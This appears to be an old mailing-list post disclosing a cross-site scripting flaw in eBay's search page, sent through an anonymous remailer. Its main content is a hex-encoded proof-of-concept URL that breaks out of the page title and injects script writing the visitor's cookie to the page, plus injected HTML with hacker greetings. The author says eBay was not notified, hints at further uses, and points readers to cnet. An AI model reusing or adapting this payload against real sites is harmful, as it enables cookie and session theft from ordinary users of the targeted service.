cross site scripting vulnerability on ebay.com

["- -" <phine () anonymous to>]

There is a cross-site scripting vulnerability within the search code @ ebay.com Below is the proof of concept URL & is 
harmless.. make sure it is entered exactly as it is shown. Of course, if you have ANY brains AT ALL.. you will verify 
the hex values in the URL before processing the link. Basically, it just document.write's the cookie that ebay.com 
stores in your browser. However, there are many more possibilities.. ebay has not been notified.

http://cq-search.ebay.com/search/search.dll?query=%70%68%69%6e%65%20%30%77%6e%73%20%29%3c%2f%54%49%54%4c%45%3e%3c%53%43%52%49%50%54%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%42%3e%59%6f%75%72%20%43%6f%6f%6b%69%65%20%49%73%20%42%65%6c%6f%77%3a%3c%2f%42%3e%3c%42%52%20%2f%3e%27%20%2b%20%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%3c%2f%53%43%52%49%50%54%3e<BR+/><CENTER><B>...Your+0wner+is+above...</B><BR+/>(in+the+TITLE+tag...+d0h!)<P+/>..<B>greetz</B>..<BR+/>s1gnal_9,+Narr0w,+%23!security+and+PBS+;]</CENTER><P+/><FONT+FACE="Arial"+SIZE="2px"><B>So+many+new+IE+bugz+out...+So+many+new+possibilities!</B><BR+/>Where+Do+You+Want+To+Go+Today?®</FONT><P+/><TITLE>+(+heh.

Try playing with cnet /*you just might find something interesting*/ ;]

'phine

------------------------------------------------------------
This email was sent through the free email service at http://www.anonymous.to/
To report abuse, please visit our website and click 'Contact Us.'